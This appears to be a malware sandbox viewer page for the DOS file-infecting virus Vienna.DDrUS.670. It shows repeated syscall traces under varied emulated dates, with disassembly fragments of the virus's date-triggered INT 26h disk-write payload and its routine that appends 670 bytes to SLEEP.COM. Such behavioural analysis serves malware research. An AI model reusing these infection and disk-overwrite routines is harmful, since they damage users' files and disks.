Sample viewer

vx.netlux.org/Virus.DOS.Vienna.DDrUS.670

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:14.307068874Z 48 PC: 12a69 | Get DOS version
2018-12-17T22:53:14.308222204Z 47 PC: 12a75 | Get disk transfer address
2018-12-17T22:53:14.309391187Z 26 PC: 12a85 | Set disk transfer address
2018-12-17T22:53:14.310435429Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ac4
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
2018-12-17T22:53:14.31191245Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: pop si
0x12ac5: push si
0x12ac6: add si, 0x31
0x12ac9: lodsb al, byte ptr [si]
0x12aca: mov cx, 0x8000
2018-12-17T22:53:14.314488899Z 42 PC: 12aab | Get date 0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: pop si
0x12ac5: push si
0x12ac6: add si, 0x31
0x12ac9: lodsb al, byte ptr [si]
0x12aca: mov cx, 0x8000
0x12acd: repne scasb al, byte ptr es:[di]
0x12acf: mov cx, 4
0x12ad2: lodsb al, byte ptr [si]
0x12ad3: scasb al, byte ptr es:[di]
0x12ad4: jne 0x12ac4
2018-12-17T22:53:14.316596256Z 78 PC: 12b3c | Find first file
2018-12-17T22:53:14.322529107Z 67 PC: 12b78 | Get or set file attributes
2018-12-17T22:53:14.326783311Z 67 PC: 12b88 | Get or set file attributes
2018-12-17T22:53:14.343434889Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:53:14.347828582Z 87 PC: 12b9e | Get or set file date and time
2018-12-17T22:53:14.350156657Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7
0x12bab: jmp 0x12bad
0x12bad: mov ah, 0x3f
0x12baf: mov cx, 3
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si
0x12bb7: int 0x21
0x12bb9: jb 0x12c0e
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e
0x12bc0: mov ax, 0x4202
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax
0x12bd5: add cx, 0x2fd
0x12bd9: mov di, si
2018-12-17T22:53:14.352477905Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:53:14.358951288Z 66 PC: 12bcb | Move file pointer
2018-12-17T22:53:14.361548554Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-17T22:53:14.370724126Z 66 PC: 12c00 | Move file pointer
2018-12-17T22:53:14.372567073Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:53:14.386407641Z 87 PC: 12c1f | Get or set file date and time
2018-12-17T22:53:14.38819748Z 62 PC: 12c23 | Close file
2018-12-17T22:53:14.396033103Z 67 PC: 12c30 | Get or set file attributes
2018-12-17T22:53:14.406541464Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:02.183670602Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:02.185928804Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:02.187827462Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:02.18954181Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ac4
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:02.192597999Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:02.199984548Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:02.206105709Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:02.224219159Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:02.23248842Z 87 PC: 12b9e | Get or set file date and time
2018-12-25T12:30:02.234047203Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7
0x12bab: jmp 0x12bad
0x12bad: mov ah, 0x3f
0x12baf: mov cx, 3
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si
0x12bb7: int 0x21
0x12bb9: jb 0x12c0e
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e
0x12bc0: mov ax, 0x4202
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax
0x12bd5: add cx, 0x2fd
0x12bd9: mov di, si
2018-12-25T12:30:02.236394515Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:02.245352735Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:02.247843466Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:02.266764012Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:02.269972284Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:02.277404945Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:02.279092316Z 62 PC: 12c23 | Close file
2018-12-25T12:30:02.288158985Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:02.295295267Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:02.795865335Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:02.79732891Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:02.798309023Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:02.799192056Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ac4
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:02.802024681Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
0x12ac4: pop si
0x12ac5: push si
0x12ac6: add si, 0x31
0x12ac9: lodsb al, byte ptr [si]
0x12aca: mov cx, 0x8000
2018-12-25T12:30:02.804164944Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:02.810106565Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:02.816748048Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:02.835448102Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:02.842544552Z 87 PC: 12b9e | Get or set file date and time
2018-12-25T12:30:02.844357608Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7
0x12bab: jmp 0x12bad
0x12bad: mov ah, 0x3f
0x12baf: mov cx, 3
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si
0x12bb7: int 0x21
0x12bb9: jb 0x12c0e
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e
0x12bc0: mov ax, 0x4202
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax
0x12bd5: add cx, 0x2fd
0x12bd9: mov di, si
2018-12-25T12:30:02.846737361Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:02.852839823Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:02.854388453Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:02.862664438Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:02.864506933Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:02.870935346Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:02.876313667Z 62 PC: 12c23 | Close file
2018-12-25T12:30:02.884363246Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:02.894647717Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:03.098401087Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:03.107426695Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:03.108390021Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:03.109285637Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ac4
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:03.111787226Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:03.117381844Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:03.122769978Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:03.140935061Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:03.145533148Z 87 PC: 12b9e | Get or set file date and time
2018-12-25T12:30:03.146557147Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7
0x12bab: jmp 0x12bad
0x12bad: mov ah, 0x3f
0x12baf: mov cx, 3
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si
0x12bb7: int 0x21
0x12bb9: jb 0x12c0e
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e
0x12bc0: mov ax, 0x4202
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax
0x12bd5: add cx, 0x2fd
0x12bd9: mov di, si
2018-12-25T12:30:03.149246795Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:03.153221552Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:03.15419274Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:03.161084529Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:03.162266345Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:03.166507291Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:03.167857574Z 62 PC: 12c23 | Close file
2018-12-25T12:30:03.242595515Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:03.275931333Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:03.690289944Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:03.692321768Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:03.693626153Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:03.694766438Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ac4
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:03.697740372Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:03.704756837Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:03.711658105Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:04.801121094Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:04.809665465Z 87 PC: 12b9e | Get or set file date and time
2018-12-25T12:30:04.811222284Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7
0x12bab: jmp 0x12bad
0x12bad: mov ah, 0x3f
0x12baf: mov cx, 3
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si
0x12bb7: int 0x21
0x12bb9: jb 0x12c0e
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e
0x12bc0: mov ax, 0x4202
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax
0x12bd5: add cx, 0x2fd
0x12bd9: mov di, si
2018-12-25T12:30:04.813631499Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:04.821212298Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:04.822692743Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:05.014007823Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:05.016482564Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:05.024167502Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:05.025683957Z 62 PC: 12c23 | Close file
2018-12-25T12:30:05.046841105Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:05.067095798Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:03.82704994Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:03.828595258Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:03.829779284Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:03.830838285Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ac4
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:03.833121478Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:03.839168988Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:03.844467349Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:04.653950274Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:04.661374598Z 87 PC: 12b9e | Get or set file date and time
2018-12-25T12:30:04.662730469Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7
0x12bab: jmp 0x12bad
0x12bad: mov ah, 0x3f
0x12baf: mov cx, 3
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si
0x12bb7: int 0x21
0x12bb9: jb 0x12c0e
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e
0x12bc0: mov ax, 0x4202
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax
0x12bd5: add cx, 0x2fd
0x12bd9: mov di, si
2018-12-25T12:30:04.664788968Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:04.669597776Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:04.671062872Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:04.782966825Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:04.785081627Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:04.791840538Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:04.793233478Z 62 PC: 12c23 | Close file
2018-12-25T12:30:04.9265989Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:05.0637534Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:04.877555514Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:04.878833636Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:04.880841855Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:04.882451068Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ac4
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 6
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1
0x12ab4: mov cx, 1
0x12ab7: mov dx, 0
0x12aba: mov ds, word ptr [di + 0x37]
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:04.885374539Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:04.893610403Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:04.900717919Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:05.543689166Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:05.54878029Z 87 PC: 12b9e | Get or set file date and time
2018-12-25T12:30:05.549902494Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7
0x12bab: jmp 0x12bad
0x12bad: mov ah, 0x3f
0x12baf: mov cx, 3
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si
0x12bb7: int 0x21
0x12bb9: jb 0x12c0e
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e
0x12bc0: mov ax, 0x4202
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax
0x12bd5: add cx, 0x2fd
0x12bd9: mov di, si
2018-12-25T12:30:05.551427092Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:05.556356798Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:05.557547027Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:05.563505462Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:05.565862312Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:05.570318912Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:05.571410395Z 62 PC: 12c23 | Close file
2018-12-25T12:30:05.580589672Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:05.592218914Z 26 PC: 12c3b | Set disk transfer address